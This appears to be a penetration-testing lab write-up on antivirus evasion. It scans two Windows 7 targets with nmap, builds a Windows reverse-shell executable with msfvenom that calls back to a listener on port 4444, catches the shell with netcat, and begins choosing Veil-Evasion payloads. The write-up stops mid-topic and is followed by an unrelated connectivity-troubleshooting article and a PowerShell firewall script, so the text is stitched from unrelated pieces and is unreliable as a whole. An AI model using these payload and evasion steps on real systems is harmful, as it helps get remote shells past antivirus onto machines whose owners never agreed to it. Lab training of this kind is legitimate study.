Ok this isn't within the scope of OSCP, but somehow eLS found it necessary to include it in their labs and I found it interesting anyway, though somewhat divorced from much of their other content.

In this lab we are given two boxes as targets. But we are not required to break into either; in fact we are given the admin credentials to log on via RDP. One of them has Avast Antivirus installed, the other has Microsoft Security Essentials. Our goal is to generate reverse shell payloads, copy them over to our targets with AV running and get them to execute without the AV catching them.

The initial host discovery scan finds the two targets:

    Nmap done: 256 IP addresses (3 hosts up) scanned in 10.00 seconds

A more detailed OS discovery scan:

    18# nmap -Pn -n -sV --script=smb-os-discovery.nse 172.16.5.5,10
    139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
    445/tcp  open  microsoft-ds  Windows 7 Professional 7600 microsoft-ds (workgroup: WORKGROUP)
    1025/tcp open  msrpc         Microsoft Windows RPC
    1026/tcp open  msrpc         Microsoft Windows RPC
    1027/tcp open  msrpc         Microsoft Windows RPC
    1028/tcp open  msrpc         Microsoft Windows RPC
    1029/tcp open  msrpc         Microsoft Windows RPC
    Service Info: Host: VICTIM02-MSE; OS: Windows; CPE: cpe:/o:microsoft:windows
    |   OS: Windows 7 Professional 7600 (Windows 7 Professional 6.1)
    |   OS CPE: cpe:/o:microsoft:windows_7::-:professional
    |   NetBIOS computer name: VICTIM02-MSE\x00
    Service Info: Host: VICTIM01-AVAST; OS: Windows; CPE: cpe:/o:microsoft:windows
    |   NetBIOS computer name: VICTIM01-AVAST\x00
    Nmap done: 2 IP addresses (2 hosts up) scanned in 83.85 seconds

Now let's start with an unencoded msfvenom reverse shell payload:

    18# msfvenom -a x64 --platform Windows -p windows/x64/shell_reverse_tcp LHOST=172.16.5.50 LPORT=4444 -f exe -o bare_payload.exe
    No encoder or badchars specified, outputting raw payload

Next we RDP login to host 10 (Avast), disable the AV and see if our normal reverse shell works. As expected, our nc listener catches the reverse shell payload:

    nc -nlvp 4444
    connect to from (UNKNOWN) 1033
    Copyright (c) 2009 Microsoft Corporation.
    Tunnel adapter Teredo Tunneling Pseudo-Interface:

Ok, now let's turn Avast on and run the same payload. This time the antivirus catches the payload and prevents it from executing.

You can install Veil with apt install veil if you don't have it. Be warned, mine took up 830MB of hard drive space and took hours to install because of the numerous required dependencies; don't do it near bedtime (but what is sleep to pentesters anyway?)

If you prefer a video you can follow this, but I will be walking through how to use Veil-Evasion below. The main menu lists the available tools, including:

    checkvt    Check against generated hashes

We're looking to evade AV, so choose 1:

    Veil>: use 1

    Available Payloads:
    23) powershell/shellcode_inject/psexec_virtual.py
    24) powershell/shellcode_inject/virtual.py
    29) python/shellcode_inject/aes_encrypt.py
    30) python/shellcode_inject/arc_encrypt.py
    31) python/shellcode_inject/base64_substitution.py
    32) python/shellcode_inject/des_encrypt.py
    34) python/shellcode_inject/letter_substitution.py

Now what payload should we choose here? Most of the options look alien, and I couldn't find a simple reverse shell payload (what are the various shellcode_inject ones?), but the Meterpreter payloads are unmistakable.

Now, if you had been watching the video linked above, the author explains that the lower-level the language in use, the better it evades AV detection. That would mean C would be preferred here; I'm not familiar with Golang, but it appears to be a low-level language as well. Scripting languages like Ruby, Python, PowerShell and Perl are higher-level languages. Curiously there's no C++/Java, but there is C#. We can come back and try others later.

Troubleshooting lab connectivity

This article contains various suggestions and tips to help troubleshoot setup and connectivity issues. If you have additional issues, contact support.

I can't send/receive pings from Windows or macOS

Windows generally has aggressive firewall rules set up, even for ICMP (ping) traffic (both incoming and outgoing). Be sure that you've enabled your Windows machines to be able to both send and receive ICMP traffic. A faster, but riskier, approach to test this is to (temporarily) disable the Windows firewalls to see if it makes any impact.
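The ICMP troubleshooting tip above offers a choice between enabling ICMP properly and switching the firewall off. The following PowerShell script is an added example, not part of the original post or of any eLS material: it keeps the firewall on and adds one narrow inbound rule for ICMPv4 echo requests from the lab subnet, then verifies connectivity. It uses netsh advfirewall, which exists on Windows 7 and later (the NetSecurity cmdlets are not available on the Windows 7 lab targets). The rule name, the 172.16.5.0/24 lab subnet and the 172.16.5.50 peer address are assumptions taken from the addresses used in the post; adjust them for your own lab.

```powershell
# Added example (not from the original article): allow ping through the
# Windows Firewall instead of disabling the firewall outright.
# Assumptions: rule name, lab subnet and peer address below are ours.

$ruleName = 'LabICMPv4EchoIn'    # assumed rule name (no spaces, so netsh quoting is not an issue)
$labNet   = '172.16.5.0/24'      # assumed lab subnet that is allowed to ping this host
$peer     = '172.16.5.50'        # assumed peer (the attacking box in the post) used for the check

# 1. Confirm the firewall is ON for every profile; we want it to stay that way.
netsh advfirewall show allprofiles state

# 2. Replace any earlier copy of our rule, then add a narrow inbound rule:
#    ICMPv4 type 8 (echo request), any code, only from the lab subnet.
#    Echo replies to pings we send ourselves are matched by the firewall's
#    state table, so no separate outbound or type-0 rule is required.
netsh advfirewall firewall delete rule name=$ruleName | Out-Null
netsh advfirewall firewall add rule name=$ruleName dir=in action=allow `
    protocol=icmpv4:8,any remoteip=$labNet

# 3. Show the rule exactly as the firewall stored it.
netsh advfirewall firewall show rule name=$ruleName

# 4. Check the outbound direction from here; the inbound rule can only be
#    confirmed by pinging this host from the peer, so say so.
if (Test-Connection -ComputerName $peer -Count 2 -Quiet) {
    "ICMP to $peer works. Now ping this host from $peer to confirm the inbound rule."
} else {
    "No reply from $peer: check the firewall rules on $peer and the network path."
}
```

Scoping the rule to the lab subnet with remoteip is the point of the example: it gives the lab the ping visibility it needs without exposing the host to echo requests from every network it joins, which is what disabling the firewall (the "riskier approach" above) would do.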